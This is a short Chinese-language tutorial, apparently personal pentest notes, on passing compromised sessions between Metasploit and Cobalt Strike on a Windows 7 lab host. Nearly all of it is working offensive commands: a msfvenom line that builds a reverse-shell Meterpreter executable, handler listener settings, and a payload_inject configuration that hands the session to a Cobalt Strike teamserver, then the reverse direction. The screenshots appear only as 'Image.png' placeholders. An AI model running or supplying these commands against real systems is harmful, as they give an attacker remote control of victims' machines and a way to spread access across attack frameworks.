0x01[MSF To CS]

  • 首先上线一个MSF 我这里是WIN7

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.128 LPORT=7777 -f exe > ./msfcs.exe
    • 将生成的msfcs.exe上传到win7
    • 设置MSF监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.44.128
set LPORT 7777
run
  • 然后运行win7上面的msfcs.exe
  • 获得shell

Image.png
Image.png
Image.png

  • 到CS端 先添加一个Listeners

Image.png
Image.png
Image.png

  • 在MSF端中background后执行下面命令
use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set DisablePayloadHandler true //MSF已建立监听
set LHOST 192.168.44.128 //teamserver IP
set LPORT 83 //cs监听器中监听的端口
set SESSION 1  
exploit

Image.png

0x02[CS To MSF]

  • 首先上线一个CS 还是前面的WIN7

Image.png
Image.png
Image.png

  • 将生成的exe上传到WIN7并执行,上线一个CS

Image.png

  • 在MSF中执行下面命令
set payload windows/meterpreter/reverse_http
use exploit/multi/handler
set lhost 192.168.44.128
set lport 6666
run
  • 然后在CS中 设置监听

Image.png
Image.png
Image.png
Image.png

  • MSF成功上线

Image.png